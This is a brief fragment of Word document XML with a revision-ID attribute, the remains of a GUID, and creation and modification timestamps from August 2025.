    <w:rsid w:val="00E71206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1B167-4FD3-4238-8606-C338944F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E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E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E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E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E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E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0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E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E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0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E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0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E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03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2025-08-17T02:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-17T02:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>